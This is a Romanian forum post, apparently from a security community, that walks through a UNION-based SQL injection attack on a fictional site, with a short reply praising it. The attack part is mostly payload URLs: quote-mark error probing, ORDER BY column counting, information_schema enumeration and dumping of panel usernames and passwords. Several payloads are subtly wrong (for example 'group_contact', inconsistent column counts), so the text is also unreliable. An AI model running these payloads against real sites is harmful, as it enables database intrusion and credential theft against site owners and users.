mDOS Posted September 5, 2019 Report Posted September 5, 2019 Sa zicem ca aveti un site din programul "Big Bounty" si vreti sa incercati un atac MYSQL. Eu am sa pun urmatorul site fictional: https://victimescu.com/index.php?id=5 Pentru a verifica daca site-ul nostru da o eroare Sql trebuie sa punem dupa parametrul .php?.id=5 semnul ('). Daca acesta este vulnerabil va scrie urmatoarea chestie: You have an error in your SQL syntax; check the manual that corresponds to your….. Continued Daca acesta nu este vulnerabil, site-ul nostru va functiona normal. In continuare trebuie sa mergem cu parametrul (ORDER BY ) ca in pasul de mai sus. - Acesta este folosit pentru a verifica cate coloane se afla pe pagina respectiva in baza de date mySQL. https://victimescu.com/index.php?id=5 ORDER BY 5 - Daca pagina noastra functioneaza perfect normal inseamna ca sunt prezente mai mult de 5 coloane in baza de date. Incercam sa marim numarul cu 10. https://victimescu.com/index.php?id=1 ORDER BY 15- Sa zicem ca acum ne va aparea eroarea care ne indica numarul de coloane prezente. Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’ Sa zicem ca pe site-ul nostru fictional avem prezente 9 coloane. Acum continuam doar cu parametrul (UNION SELECT). https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9 In continuare trebuie sa apara 2 numere care indica unde facem injectarea. ------------------------------------------------- Un numar din cele 2 va fi boldit. ------------------------------------------------- Sa zicem ca cele 2 numere sunt 5 si 3 iar cel care ne indica baza de date sau coloana unde trebuie facuta injectarea este 5. https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables Aceasta comanda ne ajuta sa vedem ce se afla in aceasta baza de date. CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS In continuare pentru a extrage mai multe chestii scriem urmatoarea comanda: https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()- in continuare o sa ne apara: -useri -parole -email-uri -etc https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database- Aceasta comanda a fost folosita pentru a afla parola de la panel. ------------------------------------------------- Deseori parola va fi in format MD5 ------------------------------------------------- Acesta a fost tutorialul si sper sa fie folosit in scopuri bune. 2 Quote
n3Oh Posted September 6, 2019 Report Posted September 6, 2019 (edited) Mamaaa, asta m-a invatat pe mine cineva (tot de aici insa nu mai retin nick-ul) acum 5-6 ani cred :-)) (era pe timpul cu rstcenter...) Foarte bun tutorial. O sa caut in pc-ul meu ca aveam ceva syntaxe cu sqli, si le postez tot aici. Edited September 6, 2019 by n3Oh 1 1 Quote